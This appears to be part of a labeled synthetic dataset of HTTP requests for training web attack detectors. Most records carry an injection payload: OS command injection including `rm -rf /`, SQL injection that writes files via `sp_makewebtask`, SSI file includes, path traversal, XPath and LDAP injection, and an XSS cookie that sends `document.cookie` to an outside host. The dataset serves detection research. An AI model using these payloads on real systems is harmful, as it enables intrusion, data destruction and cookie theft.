Warning: 351 24.73.41.38:3 "Asogrdto" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35825
Start - Id: 49281
class: XPathInjection
GET /ssEo/tkz5MvoOw/thaeIstafneaan4rgl/4OS2JG36yUEVUR11f4/04I/aBNDQbmpIGjniohR/sQ2MWJpXfJoLqqZ/h92k5WSe6f5pbgwb/trniUlfvtmh6gngCis/Abteirah9emlb8f/Cselect-baKqnVsh/gspxeOtq.asp?la8ceNalrnh6ewa=lowohewi&O77oohnoef=7514&otstsHoR01di3r=y38trmda%27++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++%27rHer0rc%27++%3D+++%27 HTTP/1.0
Host: www.Tilo.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.3, gzip;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 226.125.42.173
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Wed, 25 Jan 06 07:29:45 CET
ETag: W/"fo6EYsaCceVK_1Da"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Apr 04 05:30:26 UTC
If-Unmodified-Since: Thu, 10 Feb 05 16:45:27 UTC
If-Match: "GOvyS9qcbFxVNGoI6"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: *
Max-Forwards: 168
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM b29IZXNhZWROemV5ZW50ZTI3c2lhZXRhamVvdGxjZTMzaWJlRXkzdG5tT3E=
Range: 305761-528973
Referer: /Strt5w/da8ctRi/nzz7L/MLhiotx/euamra.wmn
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 2.3; ec-Er; rv:1.6.4) Gecko/40901947
UA-CPU: Sparc
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: 2.4 www.saoii.css:01974
Transfer-Encoding: deflate
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 55.91.27.185
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49281
Start - Id: 43274
class: OsCommanding
GET /udecnFsTa1T/WR948E%uTapjE.tiff?dac=dL.Q4CzvE&nAntiee3a=fdiaGeaoOe%3A&9tisfrhn=lvRt19M&ewtySncgg=%27+++++%3B++++ps++++-aux+++%3B&2myh2=yvarbe&pwda=5ae&rH7dsutsnbimna=b3J0Ty9M HTTP/1.0
Host: www.sox5oi.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: gb2312, macintosh
Accept-Encoding: gzip;q=0.3
Accept-Language: mlseU-Kd, a8zt-hh, 8ifEr5el-vex, hEi3-Lrzherp
Cache-Control: min-fresh=09
Client-ip: 199.96.226.205
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="51"
Date: Sat, 20 Feb 10 16:21:39 UTC
ETag: "z_5BfkhKaV82SwEk57_"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: b08ere@eeNTe.st
If-Modified-Since: Sun, 18 Jul 04 11:02:48 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: "i6IRoZvzAP90gAs3PG"
If-Range: *
Max-Forwards: 4038
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Digest opaque="letle"
Range: 6444-90250,-039,9-0896
Referer: /0esir/tcMoechn.bin
TE: trailers,trailers
Trailer: Range
User-Agent: 1twbPhn (eE9@Ip3P; h_bDcpShZ; a@OF4KcPn; eo4mBer_K)
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 478x271
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: compress
Upgrade: tbvt2/4.8, iobdph/8.7, ciose/9.7
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 257557
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43274
Start - Id: 35921
class: XPathInjection
POST /C1TolpassthruWm9d.aspx? HTTP/1.0
Content-Length: 185
Content-Language: l05eSi,dwec
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Host: www.tsE4ge0.de
Connection: close
Accept: audio/basic;q=0.7
Accept-Charset: iso-8859-5, x-mac-arabic, shift_jis, koi8;q=0.2, euc-jp;q=0.7
Accept-Encoding: deflate;q=0.5
Accept-Language: SZeSo4-yqiato, nms-oaoteie;q=0.7, uwsPnA-rss, wzihlng-iaatgaxo;q=0.7, 4Eese-ale;q=0.3
Cookie: tN0ehqtiuivs=/6or;othmeethm5llrd=ehiRbpdDtf';chooose=3070619422;aeC4fenasyS=de/cidote/rIHgt0/child::node()[ position()=0]     |  h6/anuf/ae/child::text()[position()=048]  or '1vlplgme'  =';4fB5vAb=49;irel=dmna1tviibibcYspvN
Cookie2: $Version="27"
Date: Tue, 01 Jun 04 12:06:30 UTC
Expect: aox4eiwt=rmTtaint
If-Modified-Since: Tue, 15 Jun 04 06:41:17 GMT
If-Unmodified-Since: Fri, 29 Apr 05 02:06:51 UTC
If-Range: *
Max-Forwards: 2749
Referer: /jpae.nsf
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 5.0; 1a-tt; rv:4.2.6) Gecko/50310839
Transfer-Encoding: Hpor; scsyzhcm=hmem

rlau6ocruftrk=nzbsnicenT&Edspteierhss=ohfUhEatAa&osqelseppr0rhvt=4830&vo=eUib&s5inionh=53365&anena3mAyEt=wbSr&EpteIsiicinoiar=t?S\uesevN~d &Tn8uodeH=hV-&YgkpasswdA4havingls@JVk=4c

End - Id: 35921
Start - Id: 43602
class: OsCommanding
GET /6PvC50HfusrMLH/rv/szQDVtQnSWRFG6BK6f-K/eH_Vb/o.g0RL/tvTFCpudUY0JPsz66CW/0Uc@T/ebwrii1ephoroda/jarf9xy@/raiineoz.htm?shutdownincludeaW=oetdLevkvee+metar&qH2xVbqcmd=64791&02dCV=psnA6%5Ccfc7&Nn7@logQK8k0r=wene4gxoa3&unionPRI=409&Tjwbin=%60+rm+-rf+++++%2F+%60 HTTP/1.0
Host: www.iaexc6.com
Connection: close
Accept: text/*;q=0.1, image/jpeg
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=656
Cookie2: $Version="136"
Date: Tue, 28 Jun 05 14:40:16 GMT
Expect: 100-continue
From: awehd@endxee1r.de
If-Modified-Since: Sun, 11 May 08 05:42:36 CET
If-Unmodified-Since: Wed, 22 Jun 05 17:49:07 GMT
If-Range: Fri, 30 Jun 06 04:57:17 GMT
Max-Forwards: 09
Pragma: 3tBe=n0
Proxy-Authorization: Digest cnonce="D9sta"
Authorization: ert8 sliox7it=enta
Range: 9-,347230-,48520-80
Referer: /tdoo/Thfe/hsttle/eonc.avi
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 1.1; OA-et; rv:8.0.2) Gecko/39358367
UA-Disp: 4020,061,32
UA-OS: WinNT
Via: th0ixr/8.9 www.Raemu.html, ghrh9/5.0 40.54.124.76
Transfer-Encoding: IUhe; baEti8te=Qpkwa
Upgrade: vrassd/8.3, ytno7/0.2
X-Serial-Number: 0460781607316312
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43602
Start - Id: 42201
class: SqlInjection
GET /tp10nD046X9bP5Ubp5U/djicaCQxqc/eO8r3pj-jYxT4/8tBe/y7-3uEA7I4adminsam./acP6eREsu6/tsssxcrefeenenm/xspofeyeqna.cgi?smti=ax5yNid6cv2&yhzthlih4eymlon=5&3rtnleasgtd=92282935&2SJKMVYsBAorE=Tr&4h=OR+%27iaPrd4c%27+++++%3D+++%27+++%27&Ka7awqedleti=0199 HTTP/1.1
Host: www.n9mfoyii.st
Connection: dAues
Accept: application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2590
Client-ip: 139.139.72.242
Cookie: hfjT=29;KzFQ7dLH=iydrop;bow=)|Werlt emn2m8is<tgroup by;bid2Stfennn=00
Cookie2: $Version="304"
Date: Sun, 27 Jun 04 10:04:44 CET
ETag: W/"dHYBM.QKDh@vxmx"
Expect: f7bnrcgt=igfeRa0;whh0tf=ilat
From: g0Ln@OyJoc.biz
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Wed, 05 Aug 09 23:33:05 GMT
If-Match: *
If-None-Match: "cWxxcU_GS37u0wRk"
If-Range: "S4CAoY12fDOSu3Ve6DMj"
Max-Forwards: 7
MIME-Version: 4.5
Pragma: oae9te=s
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: Digest nonce
Range: 8473-303,-227666,770360-
Referer: /6lan/Neiap.png
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.9 (X11; U; Solaris 8.3; Rl-Ny; rv:7.2.6) Gecko/56531372
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x5537
Via: 4.6 126.11.149.103, qonc/4.8 www.lLv4sa.tiff
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 646981931152
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42201
Start - Id: 45664
class: PathTransversal
GET /aseeuclpqfaiidbTgjd/iedtItugg4nteijaneal/tfsilwaadadfuteln/sgiah4v4tpototio.css?ppO5xa=Wabody8hodle7iys&9e=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fie%2Fisne%2Fndin%2Fannira.msf&som1v=eaioUm&Pupdate0stNp1TAp=scsnng5&6aetcaytheohqto=5qYy&sheI9ta0r3oesaa=duu7riovflneCz&tborguEsfwsnaFi=tRgwinnta%3Cm%5C+sik5r HTTP/1.1
Host: 208.205.135.240
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=54496
Client-ip: 10.24.0.201
Cookie: abhtfI=A;pitimt=lud8pii;au06cDey0=kFsoyrsfei9e hc;vunberdsas=scpJU-mca
Cookie2: $Version="46"
Date: Wed, 11 Feb 04 16:58:35 UTC
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Thu, 27 Jul 06 19:38:34 CET
If-Unmodified-Since: Sun, 16 Nov 08 16:28:08 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Mar 09 17:38:24 GMT
Max-Forwards: 49
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest qop=teco
Range: 92916-
Referer: http://aJdawas.org/ridiipn2/ij9remer/Pivs.jpeg
TE: gzip;q=0.3
Trailer: Cache-Control
User-Agent: tmnCukCtS http://www.ocmks.net
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: gzip
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 291 www.olf39o.jpg "uhsenbent4l" "Tue, 24 Jan 06 02:46:29 UTC"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45664
Start - Id: 40705
class: SSI
POST /vVvKdtelnetHo2Unph-U21/bSQ@B61bHJ/xSCVAperl/rnoWr.bDDRiERTo1uGxo/egHWIgra-uHx7fi50FP/lBjOQ.Tt.T/iw/7ciele/hfntipsOix/iU9EUC/o1Sz.jsp? HTTP/1.0
Content-Length: 223
Content-Language: osM,h
Content-Encoding: deflate
Content-MD5: Vm9vYmNpYXNld3JuZnloZQ==
Content-Type: application/x-www-form-urlencoded
Host: 204.97.59.61
Connection: iaudid
Accept: audio/*
Accept-Charset: iso-2022-kr, iso-8859-8-i, utf-7;q=0.5, iso-8859-1, cp-950
Accept-Encoding: <!--  #include virtual="d:\windows\autoexec.bat"    -->
Accept-Language: *;q=0.4
Client-ip: 125.54.127.63
Cookie2: $Version="529"
If-Modified-Since: Thu, 22 Nov 07 04:59:25 CET
If-Match: "1D.dY9Q6-zHQqIE"
Pragma: no-cache
Referer: /ueeub0/hrbe0lt/nwaf/6tudu.php4
User-Agent: Mozilla/6.7 (X11; U; Linux i386 2.6; rn-ds; rv:4.9.9) Gecko/52376968
Via: 0.5 206.72.234.140, 8.5 www.5orvts.shtml, 0.4 www.ko7y.jpeg:201

ttcAtsekchee=hECPc1r&wbqinyB7Cqnph-=asiyeirEuec&mtrv5lrgSiiHs9=6&bi0xtUexQOmR=[;rho&zameLoJHcpioOma=ohtpassomvbscriptmouf&Fi=1066&eoa=d5otixrgtet6vGe9c&r9euootwfv=taeqrdd&updateJDolibG=iemcko5hi7tiaTioeh&ass=;k0t~Fo

End - Id: 40705
Start - Id: 42360
class: SqlInjection
GET /yFJ6AhP2v4FUcJshw.sh?Tet4i=veexecdefIHeotaformhtaccesn&cmyu0=1&toepetna=n27&tlj=+etcoo&quMGY_T=6358647&ntraeirtPtr=33360&dtsf=OR+++%27eAro%27+IN+++++%28+%27+%27+++%29&jIupdateAiCANTZCp=1 HTTP/1.0
Host: www.tehRarusiy.cz
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: hz-gb-2312;q=0.9, x-mac-icelandic, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: Tanhn-paeeE;q=0.8, eeyr-n;q=0.6, p-nea, latylmit-haRsE
Cache-Control: max-stale
Client-ip: 34.178.32.79
Cookie: meytstvx=locationsrincludeselect-=open6lwindow.opener;aoy3ststar=41;snlOblAhsNG6=dlikesock_streamex;pwc2ctCdEewr=IeHomzy
Cookie2: $Version="89"
Date: Sat, 29 Jul 06 22:41:51 GMT
ETag: "@SR-iRwvO_ZLLe7b"
Expect: 100-continue
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Sat, 02 Aug 08 03:17:45 GMT
If-Unmodified-Since: Wed, 24 Aug 05 02:43:40 UTC
If-Match: "wk6-mORo9SeNl-IKMyq"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 62
MIME-Version: 2.3
Pragma: yjtgmX='w'
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: /tfteiehe.fgf
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: aeofyfEssaDrsodzngAm
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 180x738
Via: 3.7 252.43.16.106, HTTP/1.2 www.iteesn.js, 5.8 www.i2srntet.gif
Transfer-Encoding: igbn3e
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42360
Start - Id: 48423
class: XPathInjection
GET /atldozaitOken54aw/Lw/y2B6pKqy33IU-7Jt/rACyn39c/tzctu7acnMd8J__vk-v0/bif9n9LC./i@lFjK.jpeg? HTTP/1.0
Host: 96.255.32.224
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-7;q=0.4, cp-936, x-mac-chinesetrad, windows-1255;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: 1joe2aia-aztd;q=0.3
Cache-Control: max-age=25840
Client-ip: 170.52.122.155
Cookie: sQ9hHit=&ynn0eyednde&;eeera2=systemoqgroup by;1la3etnnnTuusl=xk1rlbe4'  or   1<    o/la/zd/child::text()[position()=798] or    'vy16i4'  =';nNmEvar=rusv<
Date: Wed, 19 Jan 05 08:11:24 UTC
If-Modified-Since: Sun, 25 Jan 04 11:55:51 GMT
If-Unmodified-Since: Wed, 05 Apr 06 16:06:09 UTC
If-None-Match: "ploQN8wZhkg.XtK"
If-Range: Wed, 22 Jun 05 06:21:08 CET
Max-Forwards: 27
Pragma: no-cache
Range: 32-,764603-,-5924
Referer: http://www.Eie9.net/rrro/s3edm/qeeTi.nsf
TE: trailers
Trailer: Host
User-Agent: rymTRA79nt
UA-Color: color32
X-Serial-Number: 2509612458
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48423
Start - Id: 42843
class: OsCommanding
GET /j17pselectwindow.openM/ah.nsf?fri9aEp=Ic3&oxtrlteau=ineN7eFredzRs&gnssreamhaetpht=Tudejsd&iotgrrCtS=gub&a6st3SWiTg=ss&wigo=%7C+dir+..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C%2C&emvmGoc9tlsdtzs=yvaru19e+e&xeb6tesoeds=ouQNtQ0tZ HTTP/1.0
Host: www.nocdt2rc.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, compress;q=0.3
Accept-Language: rumb2d-Pne8, 7eorRnc-ene9Oj
Cache-Control: only-if-cached
Client-ip: 95.106.97.243
Cookie: edohrnebl9ct1n=Art
Cookie2: $Version="71"
Date: Tue, 09 Feb 10 12:48:11 CET
ETag: W/"olCrtg5FxsS-VvM"
Expect: tceM
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 15 Jun 06 17:11:54 UTC
If-Unmodified-Since: Thu, 26 Feb 04 22:06:48 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 10 Jun 04 19:39:53 CET
Max-Forwards: 7341
MIME-Version: 7.9
Pragma: uP=onn
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: http://ydanet.gov/5anrnrnt/trbs/eofsta3A/n3oeio/jllme.js
TE: gzip,chunked;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/7.6 (X11; U; Open BSD i386 7.4; tp-Mn; rv:3.0.6) Gecko/46873144
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color8
Via: 9.5 184.151.58.202, Rrie/1.5 www.wfeC.htm:853
Transfer-Encoding: nAff
Upgrade: tlia/1.2, occce8/9.6, vefrpm/0.5
Warning: 976 www.eguwaq.html "ahcm" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 517314
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42843
Start - Id: 48495
class: XPathInjection
PUT /fhmt.jpeg? HTTP/1.0
Content-Length: 322
Content-Language: h
Content-Encoding: identity
Content-MD5: ZXRFc2JzaGVvYW9pdHoydg==
Content-Type: application/x-www-form-urlencoded
Host: www.tnwitgee.be:79211
Connection: my7i
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=4
Date: Fri, 24 Aug 07 18:47:24 UTC
If-None-Match: "Z989yHaJOyFT2C5a99i@"
Max-Forwards: 922
Referer: /nhryAha.pdf
TE: trailers
User-Agent: eoIrjosimsApe
X-Serial-Number: 01871

.kZ8sGYmBQS=3JF9W-DbFOW&6nhtf5iyayi=tt4iSbitabnu&tOdz=lUWtAa6KFqus&Pni33futzrido=nwey4w%k&&iehuinw=oimgewsey/4wnseqandc&oSseoeeeh0dl=263829&kydm3St=itlrc&aarQ=iagriiusrui&rBposutycdrLD=s8f'  or     F/E38/child::node()[processing-instruction()=462] or   '5Aea56kh' = '&glo2snsed7b=ti e

End - Id: 48495
Start - Id: 38273
class: LdapInjection
GET /DsjrAO4m5Z5sQ/r8/Nnetcat33tW7.htm?idbaeArmN=%29++%28+%7C++++%28Ycta%3Dea*%29 HTTP/1.1
Host: 80.164.10.183
Connection: keep-alive
Accept: application/*;q=0.0
Accept-Charset: windows-1255;q=0.2, iso-8859-8-i;q=0.6, windows-1253;q=0.1, x-mac-cyrillic;q=0.1, x-mac-japanese
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 227.248.33.223
Cookie: tihsyoip=2172409;fwtrstiea=ilvfaoRL4enroasyg;swsntapeaop=s7ivc8htacces<tv
Cookie2: $Version="30"
Date: Sat, 28 Oct 06 05:45:30 CET
ETag: "YAtQRZ8M5wKeOH1a4o"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: Tue, 16 Nov 04 18:44:11 GMT
Max-Forwards: 2
MIME-Version: 0.2
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: Digest username="mscm"
Authorization: Basic aWQ5aHNoZTpubnlmdA==
Range: 2323-,18-
Referer: /zefiegor/eteit/stJr/loDet.php4
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 6.0; 2o-to; rv:4.0.1) Gecko/11286492
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: 5caiho; ciuh=ht7qou
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 70527822
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38273
Start - Id: 41048
class: SqlInjection
GET /TH/ijDmhsbltsxnp/u6UXW5ElKfT3j7Rf4iN/xYbkYLu/rM7ENFfA2jveY/kretch/LrrUeD6cddJz/hrned.tiff?lBwcXu9ty9p8=iU6NbdPFGVhs&d5sahAruLHemou=ie%27tojS3E3fmail&aEwnolis=%27%3B++++EXEC+++master.dbo.sp_makewebtask+++%27c%3A%5Cinetpub%5Cwwwroot%5Coh0no.css%27%2C+++++%27SELECT+++++ttj++FROM++++fosuen++WHERE++++xtype%3D%27%27U%27%27%27&tkrPqiRh=%3Btr0ha HTTP/1.1
Host: www.oEty.it
Connection: close
Accept: */*
Accept-Charset: euc-cn, x-mac-japanese, macintosh
Accept-Encoding: gzip;q=0.9, deflate;q=0.1
Accept-Language: eeWhel-eEh2igo
Cache-Control: min-fresh=49
Client-ip: 44.24.68.129
Cookie: mcrit49l=tcknsoas1;nhdeTpk=bnph-atb;dsfoaaoo0oOth=d=n+E xtermmochartt;dchliZieAt=e n
Cookie2: $Version="90"
Date: Tue, 27 May 08 06:20:40 GMT
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: 100-continue
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Sun, 07 Feb 10 17:03:43 UTC
If-Unmodified-Since: Tue, 07 Nov 06 15:30:30 UTC
If-Match: "jSzQHB0T80PLAdbPxQ"
If-None-Match: "TVChpAh0AxyC034l2Y-F"
If-Range: Sun, 11 Mar 07 09:20:44 GMT
Max-Forwards: 09
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="jpdruSsi"
Authorization: usdeqo aankat=dlpyl
Range: 7-04,570-
Referer: /jnepoti/eyea/aaeee9a/eytxEnb.shtml
TE: trailers,trailers
User-Agent: 0or2eifeeeieyrthnia
UA-CPU: PowerPC
UA-Disp: 439,0025,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 381x817
Via: 6.2 197.203.200.111:980
Transfer-Encoding: compress
Upgrade: rqi/9.1, ehxi/6.6, pyu/0.2
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41048
Start - Id: 39615
class: SSI
GET /ehidts/gdbQoKSP5Ou.tiff?E2elUttchstwca=023&tt3ntam8snt=l%5CT3p+shavingm&nergOest3rimm=xLY3&tt=eol&hflfPre4s0oo6th=6095543&9sXBmZ2O@00=eiitqoopeas&Xperl@0=860614&rHyentvrsd=%3C%21--++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&4whereGdnSmeY0=nmcnbagnlhl&rbm5qptsNekt=nitNop&1on7ubhl=tccnevhaoneeuwr&8r2reuhoUllah2r=84788929&onunSeiten=y%3Cnlrg%3Feopto%3A&eqta=2&aeeeiinyeers=lnst HTTP/1.0
Host: www.nDatv.it:52209
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=999
Client-ip: 79.170.36.207
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="143"
Date: Wed, 30 Jan 08 16:26:37 UTC
ETag: W/"nXLxjQhgJIFjcXESD"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Sun, 14 Nov 04 06:16:29 GMT
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: "ltSJNkkQ_3-n6PyJ"
If-None-Match: *
If-Range: "08my99QpmNFuY_JTS2"
Max-Forwards: 333
MIME-Version: 1.7
Pragma: ld=rius
Proxy-Authorization: Basic ZnJEb3UxOmFiQWVlMA==
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: /tidimnm.png
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: irmnn8nn (thj5uurt; ntT52zyN)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: eamhT/9.1 www.6ctIemb.js, FTP/6.6 www.dorh.png
Transfer-Encoding: compress
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39615
Start - Id: 46705
class: XSS
GET /accept9Pi.AJV/6wai0iyvgpdba/gwtesere/DefeegSws/mnrc0pdhrtma.gif?O0aXU=81302&5duAarl2lenhps=meo&sctn3ntu=fo5e%3Dcs&toop8MEmReyn=0&sJne=snnhlnjsO&mei5NcIeohn3=at%2Fhtpasse%7C8includeeiayqugni+oreplace&eeo3sOnii=rcpmu&e0e0wdq=tlHcsilsisoio&0KYVtZ=ahtaccestd%29rwr&rerfbre=0AXEKZP&criarla5=edLfW&hh=hr5&nrst=bsacasztn&lmdi=+nH32 HTTP/1.1
Host: www.ea7gyA7rt.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.1, compress;q=0.3, compress, identity;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 234.153.71.59
Cookie: enajLtpL=<div  onmouseover =   "  [document.location.replace ('http://www.eselesis.com/cgi-bin/ti.cgi'+document.cookie);] "  >
Cookie2: $Version="51"
Date: Sat, 03 Nov 07 07:25:35 UTC
ETag: "@nHpZv.96bsWfRDb"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Tue, 20 Apr 04 12:07:53 UTC
If-Unmodified-Since: Thu, 27 May 04 07:06:22 UTC
If-Match: "_HU-2ifK3TXwH-sR@4Uo"
If-None-Match: "vYtd6PYsdu3duWk-jV"
If-Range: Tue, 13 Apr 10 11:36:16 CET
Max-Forwards: 08
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic c2Fob2lrZDpldHQwcmx1ZQ==
Authorization: pkemAl oAhpr=metcuien
Range: 932-03,777-
Referer: /ecen/oindse/7itCbe/ILjht.dll
TE: gzip,gzip;q=0.3
Trailer: From
User-Agent: ewbwFU http://www.dcpqc.com
UA-CPU: Sparc
UA-Disp: 417,1521,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 450x131
Via: uoat1/1.6 247.165.240.168, 9.8 139.220.211.2
Transfer-Encoding: identity
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 183.144.127.62
X-Serial-Number: 24725262315078744174
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 46705
Start - Id: 39239
class: SSI
